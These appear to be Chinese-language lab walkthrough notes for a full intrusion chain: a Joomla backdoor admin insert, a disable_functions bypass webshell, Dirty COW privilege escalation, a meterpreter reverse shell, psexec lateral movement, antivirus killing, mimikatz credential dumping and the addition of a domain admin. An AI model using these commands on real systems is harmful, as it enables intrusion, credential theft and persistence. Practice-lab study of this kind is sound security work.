信息收集
testuser / cvcvgjASD!@
爆破失败
登录数据成功
joomlaCMS公开漏洞
mysql -uroot -p123 -h 192.168.1.110
INSERT INTO `am2zu_users`(`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)VALUES ('Administrator2', 'admin2','d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`) VALUES (LAST_INSERT_ID(),'8');
账号密码admin2:secret
登陆成功
开启了disable_functions
https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
进行文件上传
http://192.168.1.110/templates/beez3/bypass_disablefunc.php?cmd=whoami&outpath=/tmp/panda&sopath=/var/www/html/templates/beez3/bypass_disablefunc_x64.so
http://192.168.1.110/templates/beez3/bypass_disablefunc.php?cmd=ifconfig&outpath=/tmp/panda&sopath=/var/www/html/templates/beez3/bypass_disablefunc_x64.so
adduser wwwuser
passwd wwwuser_123Aqx
远程登录
文件上传
[wwwuser@localhost tmp]$ chmod 777 linux-exploit-suggester.sh
[wwwuser@localhost tmp]$ ./linux-exploit-suggester.sh
根据版本
本地下载 文件上传
gcc -pthread 40839.c -o dirty -lcrypt
[wwwuser@localhost tmp]$ chmod 777 dirty
[wwwuser@localhost tmp]$ rm -rf passwd.bak
[wwwuser@localhost tmp]$ ./dirty 123.com
[wwwuser@localhost tmp]$mv /tmp/passwd.bak /etc/passwd
su firefart 123.com
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.128 lport=441 -f elf > 1.elf
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.128
msf5 exploit(multi/handler) > set lport 441
msf5 exploit(multi/handler) > run
run autoroute -s 192.168.93.0/24
run autoroute -p
主机探测
use auxiliary/scanner/discovery/arp_sweep
set rhosts 192.168.93.1/24
set threads 10
run
msf5 auxiliary(scanner/discovery/arp_sweep) > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.93.1/24
msf5 auxiliary(scanner/smb/smb_version) > run
爆破密码
登录20
msf5 auxiliary(scanner/smb/smb_login) > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/psexec) > set rhost 192.168.93.20
rhost => 192.168.93.20
msf5 exploit(windows/smb/psexec) > set smbuser administrator
smbuser => administrator
msf5 exploit(windows/smb/psexec) > set smbpass 123qwe!ASD
smbpass => 123qwe!ASD
msf5 exploit(windows/smb/psexec) > run
查看进程
迁移进程
getpid
run post/windows/manage/migrate
使用sysinfo命令查看目标机的系统信息
route命令查看完整的网络设置
run post/windows/manage/killav命令关闭系统杀毒软件
run post/windows/gather/enum_logged_on_users列举当前登录靶机用户
run post/windows/gather/enum_applications列举安装在系统上的应用程序
使用run windows/gather/credentials/windows_autologin抓取自动登录的用户名和密码
load mimikatz
kerberos
msv
use incognito #help incognito 查看帮助
list_tokens -u #查看可用的token
impersonate_token 'NT AUTHORITYSYSTEM' #假冒SYSTEM token
或者impersonate_token NT AUTHORITY\SYSTEM #不加单引号 需使用\
execute -f cmd.exe -i –t # -t 使用假冒的token 执行
或者直接shell
rev2self #返回原始token
发现TESTadministrator为域控管理员账号
添加账户
meterpreter > rev2self
meterpreter > add_user bing 1234.com -h 192.168.93.10
meterpreter > add_group_user "Domain Admins" bing -h 192.168.93.10
net use \192.168.93.10ipc$ 1234.com /user:TESTing
dir \192.168.93.10c$
参考文章
http://yugod.xmutsec.com/index.php/2020/07/23/90.html
https://www.cnblogs.com/Yang34/p/11407274.html
https://www.jianshu.com/p/dc7f42ef056f
https://xz.aliyun.com/t/2536
https://www.jianshu.com/p/df72d1ee1e3e